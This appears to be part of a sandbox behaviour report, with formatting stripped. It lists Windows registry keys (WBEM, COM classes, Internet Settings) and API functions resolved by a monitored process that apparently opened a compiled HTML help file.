                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{734AC5AE-68E1-4FB5-B8DA-1D92F7FC6661}\InprocServer32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{734AC5AE-68E1-4FB5-B8DA-1D92F7FC6661}\InprocServer32\ThreadingModel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{734AC5AE-68E1-4FB5-B8DA-1D92F7FC6661}\InprocServer32\Synchronization

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{734AC5AE-68E1-4FB5-B8DA-1D92F7FC6661}\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{734AC5AE-68E1-4FB5-B8DA-1D92F7FC6661}\AppId

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="WMIPingProvider"

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AccessPermission

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32\InprocServer32

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32\ThreadingModel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaxSxSHashCount

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\InprocServer32

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\ThreadingModel

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\DllHost.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\DllHost.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\DllHost.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\AllowOnlyDNSQueryForWPAD

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameTabWindow

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameMerging

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SessionMerging

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\AdminTabProcs

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\TabProcGrowth

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache

                    
                
            

        

        

            

                
                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\LanguageList

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2\SCM Event Provider

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings

                
                
            

        

        

            

                
            

        

        

            

                
                
                hhctrl.ocx.doWinMain

                
                cryptbase.dll.SystemFunction036

                
                uxtheme.dll.ThemeInitApiHook

                
                user32.dll.IsProcessDPIAware

                
                kernel32.dll.SortGetHandle

                
                kernel32.dll.SortCloseHandle

                
                kernel32.dll.GetThreadPreferredUILanguages

                
                shell32.dll.SHGetFolderPathW

                
                ntmarta.dll.GetMartaExtensionInterface

                
                kernel32.dll.GetSystemWindowsDirectoryA

                
                kernel32.dll.GetWindowsDirectoryA

                
                advapi32.dll.CreateWellKnownSid

                
                advapi32.dll.CheckTokenMembership

                
                user32.dll.GetSystemMetrics

                
                user32.dll.MonitorFromWindow

                
                user32.dll.MonitorFromRect

                
                user32.dll.MonitorFromPoint

                
                user32.dll.EnumDisplayMonitors

                
                user32.dll.GetMonitorInfoA

                
                dwmapi.dll.DwmIsCompositionEnabled

                
                cryptsp.dll.CryptAcquireContextW

                
                cryptsp.dll.CryptGenRandom

                
                kernel32.dll.AcquireSRWLockExclusive

                
                kernel32.dll.ReleaseSRWLockExclusive

                
                api-ms-win-downlevel-shlwapi-l2-1-0.dll.IUnknown_QueryService

                
                api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertSidToStringSidW

                
                api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW

                
                urlmon.dll.#414

                
                ole32.dll.CoInitializeEx

                
                ole32.dll.CoUninitialize

                
                ole32.dll.CoRegisterInitializeSpy

                
                ole32.dll.CoRevokeInitializeSpy

                
                gdi32.dll.GetLayout

                
                gdi32.dll.GdiRealizationInfo

                
                gdi32.dll.FontIsLinked

                
                advapi32.dll.RegOpenKeyExW

                
                advapi32.dll.RegQueryInfoKeyW

                
                gdi32.dll.GetTextFaceAliasW

                
                advapi32.dll.RegEnumValueW

                
                advapi32.dll.RegCloseKey

                
                advapi32.dll.RegQueryValueExW

                
                gdi32.dll.GetFontAssocStatus

                
                advapi32.dll.RegQueryValueExA

                
                advapi32.dll.RegEnumKeyExW

                
                gdi32.dll.GdiIsMetaPrintDC

                
                sxs.dll.SxsOleAut32RedirectTypeLibrary

                
                advapi32.dll.RegOpenKeyW

                
                advapi32.dll.RegQueryValueW

                
                sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid

                
                ole32.dll.CoTaskMemAlloc

                
                ole32.dll.CoGetApartmentType

                
                ole32.dll.CoTaskMemFree

                
                comctl32.dll.#236

                
                oleaut32.dll.#6

                
                ole32.dll.CoGetMalloc

                
                shell32.dll.#102

                
                comctl32.dll.#320

                
                comctl32.dll.#324

                
                comctl32.dll.#323

                
                advapi32.dll.RegEnumKeyW

                
                apphelp.dll.ApphelpCheckShellObject

                
                ole32.dll.CoCreateInstance

                
                api-ms-win-downlevel-shlwapi-l2-1-0.dll.SHUnicodeToAnsi

                
                api-ms-win-downlevel-shlwapi-l2-1-0.dll.SHGetValueA

                
                api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemAlloc

                
                api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemFree

                
                api-ms-win-downlevel-shlwapi-l2-1-0.dll.IUnknown_Set

                
                api-ms-win-downlevel-shlwapi-l2-1-0.dll.SHStrDupW

                
                api-ms-win-downlevel-shlwapi-l2-1-0.dll.IUnknown_SetSite

                
                api-ms-win-downlevel-ole32-l1-1-0.dll.CoInitializeEx

                
                api-ms-win-downlevel-ole32-l1-1-0.dll.CoUninitialize

                
                urlmon.dll.CreateURLMonikerEx

                
                oleaut32.dll.#4

                
                secur32.dll.GetUserNameExW

                
                api-ms-win-downlevel-shlwapi-l1-1-0.dll.PathCreateFromUrlW

                
                api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertStringSidToSidW

                
                shlwapi.dll.UrlCanonicalizeA

                
                urlmon.dll.CreateAsyncBindCtxEx

                
                urlmon.dll.RegisterBindStatusCallback

                
                urlmon.dll.#484

                
                oleaut32.dll.#9

                
                api-ms-win-downlevel-shlwapi-l2-1-0.dll.SHGetValueW

                
                urlmon.dll.CoInternetCreateSecurityManager

                
                urlmon.dll.#444

                
                urlmon.dll.UrlMkGetSessionOption

                
                urlmon.dll.#522

                
                urlmon.dll.CoInternetIsFeatureEnabled

                
                shell32.dll.#66

                
                api-ms-win-downlevel-ole32-l1-1-0.dll.CLSIDFromString

                
                api-ms-win-downlevel-ole32-l1-1-0.dll.CoGetClassObject

                
                kernel32.dll.RaiseFailFastException

                
                uxtheme.dll.IsAppThemed

                
                api-ms-win-downlevel-ole32-l1-1-0.dll.CoRegisterInitializeSpy

                
                urlmon.dll.#520

                
                urlmon.dll.#521

                
                api-ms-win-downlevel-ole32-l1-1-0.dll.ProgIDFromCLSID

                
                urlmon.dll.CoInternetQueryInfo

                
